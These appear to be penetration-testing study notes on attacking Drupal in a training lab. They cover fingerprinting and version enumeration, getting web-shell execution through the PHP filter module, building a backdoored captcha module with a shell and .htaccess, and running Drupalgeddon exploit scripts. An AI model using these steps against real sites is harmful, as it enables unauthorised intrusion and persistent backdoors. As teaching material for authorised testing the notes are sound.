CMS written in PHP supporting MySQL and PostgreSQL for the backend. If not DBMS is installed can also used DBMS. Users can enhance their websites through the use of themes and modules.

Footprinting

To identify a Drupal website we can look at the header or footer message Powered by Drupal, the standard Drupal logo and the presence of a CHANGELOG.txt file or the README.txt, robots.txt referencing /node or the source code

curl -s http://drupal.inlanefreight.local | grep Drupal

Drupal indexes its content using nodes. A node can hold anything such as blog post, poll, article, etc. The page URIs are usually of the form /node/<nodeid>.

The users that exist are

  • Administrator that has complete control
  • Authenticated User that can login and perform operations such as adding articles based on their permissions.
  • Anonymous is all other visitors, by default only allowed to read posts.

Enumeration

We can enumerate to uncover the version, installed plugins, and more. Later versions of Drupal hardened against version identification such as blocking access to CHANGELOG.txt and README.txt. If version allows

curl -s http://drupal-acc.inlanefreight.local/CHANGELOG.txt | grep -m2 ""
 
curl -s http://drupal.inlanefreight.local/CHANGELOG.txt
 
# automated enumeration
droopescan scan drupal -u http://drupal.inlanefreight.local

Attacking

In older version of Drupal (<version 8) we could login in as an admin and enable the PHP filter module. From there we can Save configuration-->Content-->Add Content--> Create Basic page. We can now create a PHP page with a web shell. Text format must be PHP code. Whatever we are redirected to and then

curl -s http://drupal-qa.inlanefreight.local/node/3?dcfdd5e021a869fcc6dfaef8bf31377e=id | grep uid | cut -f4 -d">"

From version 8 onwards, PHP filter module is not installed by default. We would have to install it ourselves.

wget https://ftp.drupal.org/files/projects/php-8.x-1.1.tar.gz

Once downloaded go to Administration-->Reports-->Available Updates. Browser-->Install and then follow the same steps as last time.

If Drupal misconfigured a user to upload a new module, a backdoored module can be created by adding a shell to an existing module.

wget --no-check-certificate  https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz
tar xvf captcha-8.x-1.2.tar.gz
 
# create a PHP web shell
 
# create .htaccess to give ourselves access to /modules folder
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
</IfModule>
 
# copy web shell
mv shell.php .htaccess captcha
tar cvf captcha.tar.gz captcha/

Assuming our user has administrative access we click on Manage and then Extend and + Install new module. Once completed

curl -s drupal.inlanefreight.local/modules/captcha/shell.php?fe8edbabc5c5c9b7b764504cd22b17af=id\

It is also vulnerable to some exploits:

  • CVE-2014-3704, known as Drupalgeddon, affects versions 7.0 up to 7.31 and was fixed in version 7.32. This was a pre-authenticated SQL injection flaw that could be used to upload a malicious form or create a new admin user.
  • CVE-2018-7600, also known as Drupalgeddon2, is a remote code execution vulnerability, which affects versions of Drupal prior to 7.58 and 8.5.1. The vulnerability occurs due to insufficient input sanitization during user registration, allowing system-level commands to be maliciously injected.
  • CVE-2018-7602, also known as Drupalgeddon3, is a remote code execution vulnerability that affects multiple versions of Drupal 7.x and 8.x. This flaw exploits improper validation in the Form API.
# run exploit
python2.7 drupalgeddon.py -t http://drupal-qa.inlanefreight.local -u hacker -p pwnd